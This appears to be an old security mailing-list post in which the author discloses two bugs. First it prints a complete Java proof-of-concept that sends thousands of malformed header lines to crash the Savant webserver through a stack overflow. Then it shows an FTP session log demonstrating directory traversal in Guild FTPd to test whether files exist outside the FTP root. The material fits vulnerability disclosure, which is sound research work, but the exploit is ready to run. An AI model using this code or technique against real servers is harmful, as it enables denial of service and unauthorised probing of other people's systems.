Yo,
Errr… Sorry about saying gnu-pop3d had the same problem as FTGate -
don't know how that got in my list - I assume from posting after a rather
hectic party and before that vital cup of coffee the next day. :)
Apologies, all.
Anyway, I found a stack overflow in the Savant webserver the other day -
lemmee just paste the code I wrote here…
/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
import java.io.;
import java.net.;
class savantstack {
public static void main(String[] args) throws IOException {
if (args.length != 1) {
System.out.println("Syntax: java savantstack [hostname/ip]");
System.exit(1); }
Socket soq = null;
PrintWriter white = null;
int i = 5000; // This should do fine :-)
soq = new Socket(args[0], 80);
white = new PrintWriter(soq.getOutputStream(), true);
System.out.print("Showing " + args[0] + " the phj33r :P …");
white.print("GET /index.html HTTP/1.0");
for (int x = 0; x < i; x++) white.println("A:A");
white.println("\n");
System.out.println("Done!");
white.close();
soq.close(); } }
That's it. I also found a more minor vulnerability in Guild FTPd -
although directory transversal with GET can't be used to d/l files outside
of the FTP root directory, it can be used to see if files exist. An
example follows…
C:\wizdumb>ftp localhost
Connected to kung-phusion.
220-GuildFTPD FTP Server (c) 1999
220-Version 0.93i
220 Please enter your name:
User (kung-phusion:(none)): test
331 User name okay, Need password.
Password:
230 User logged in.
ftp> cd …
550 Access denied.
ftp> get …/nonexistant.txt
200 PORT command successful.
550 Access denied.
ftp> get …/autoexec.bat
200 PORT command successful.
150 Opening ascii mode data connection for \…/autoexec.bat (1143 bytes).
425 Download failed.
ftp> quit
221 Goodbye. Control connection closed.
The SIZE command can also be used in a similar manner.
Anyway, I'm outta here again…
Cheers,
Andrew Lewis aka. Wizdumb [MDMA]